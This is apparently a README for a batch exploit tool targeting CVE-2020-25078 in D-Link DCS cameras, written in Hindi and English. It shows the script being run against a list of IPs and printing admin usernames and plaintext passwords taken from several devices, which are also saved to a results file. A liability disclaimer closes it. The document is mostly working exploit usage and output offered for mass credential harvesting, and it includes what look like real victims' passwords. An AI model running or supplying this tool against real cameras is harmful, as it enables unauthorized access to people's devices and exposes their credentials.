
D-Link DCS श्रृंखला कैमरों को लक्षित करने वाला CVE-2020-25078 के लिए बैच एक्सप्लॉइट स्क्रिप्ट, सूचना प्रकटीकरण भेद्यता के माध्यम से खाता क्रेडेंशियल निकालने के लिए।
हमला URL को उसी निर्देशिका में रखें जैसे ip.txt
The attack IP is placed in the same directory as ip.txt
root@localhost:~/CVE-2020-25078#ls
CVE-2020-25078.py ip.txt
root@localhost:~/CVE-2020-25078#cat ./ip.txt
root@localhost:~/CVE-2020-25078#python3 ./CVE-2020-25078.py
Start Running Exploit...
[+Login URL]==> http://xxx.xxx.xxx.xxx:80 UserName: ['admin'] PassWord: ['Sruthimina123']
[+Login URL]==> http://xxx.xxx.xxx.xxx:443 UserName: ['admin'] PassWord: ['ming502219']
root@localhost:~/CVE-2020-25078# ls -l
CVE-2020-25078.py
exploit_ok.txt
ip.txt
README.md
root@localhost:~/CVE-2020-25078# cat ./exploit_ok.txt
[+Login URL]==>http://xxx.xxx.xxx.xxx:80 [+UserName]==>['admin'] [+PassWord]==>['Sruthimina123']
[+Login URL]==>http://xxx.xxx.xxx.xxx:443 [+UserName]==>['admin'] [+PassWord]==>['ming502219']
root@localhost:~/CVE-2020-25078#
किसी भी प्रत्यक्ष या अप्रत्यक्ष परिणाम और हानि जो इस दस्तावेज़ में दी गई जानकारी के प्रसार और उपयोग से उत्पन्न होती है, वह उपयोगकर्ता स्वयं वहन करेगा, और लेखक इसके लिए कोई जिम्मेदारी नहीं लेता है।
Any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article shall be borne by the user himself, and the author shall not bear any responsibility for this.